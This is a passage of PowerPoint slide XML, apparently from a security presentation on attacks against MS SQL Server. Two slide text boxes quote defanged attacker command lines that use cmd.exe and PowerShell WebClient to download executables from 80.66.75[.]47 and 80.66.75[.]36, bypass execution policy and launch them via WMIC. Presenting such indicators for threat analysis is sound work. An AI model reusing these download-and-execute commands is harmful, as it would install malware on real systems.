                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="95" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="96" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="97" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="98" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="94" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12528105" y="670170"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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1761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B9D71-C8D6-D554-3BA9-F646EECC0D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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D2BCEA-E923-43FB-F884-B9753782F57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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB051F5-49DD-D503-7FE7-86CA1F9E1F4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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF6CC91-F484-863B-23C1-DB7B2D4DA14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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D8AC2B-563D-B508-3CDA-4543A6A1A7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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7D0778-5224-0013-DC7D-1C9FBC64A9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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ECBEE10-3B7B-3FFF-C5CE-0680FC7BD839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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2A312B6-740F-244D-63BC-D47E3DDECCBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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EAFCB126-BC72-E3E9-B5EF-0AF73D742AEE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6AFC775-B7EC-485A-892F-ECB2EC417C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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0126876C-1F04-75B5-633F-808ABB8960D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD5007B-B936-A806-80F1-503F5F5AEBCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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D09B077-DD3C-E382-B9DA-7B4A352EE28E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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F9233A25-D3EB-A104-1645-36F4024434BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FC8235-0B0C-4E43-B1D2-47A621C54B07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"\"C:\\Windows\\\\System32\\\\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\" /C echo $cl = New-Object </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.Net.WebClient</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &gt; C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\updt.ps1 &amp; echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cl.DownloadFile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(\"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hxxp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80.66.75[.]36/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aRX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\", \"C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tzt.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\") &gt;&gt; %TEMP%\\updt.ps1 &amp; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecutionPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> Bypass C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AppData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\Local\Temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tzt.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0"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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE87B11-FD13-B400-F958-B68F19DACC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823503" y="5840056"/>
            <a:ext cx="2004062" cy="36856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72F5428-1C8B-D8D6-012C-7B62FB2BD33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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F0BBBDCB-9353-4737-8B00-795CB23936A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
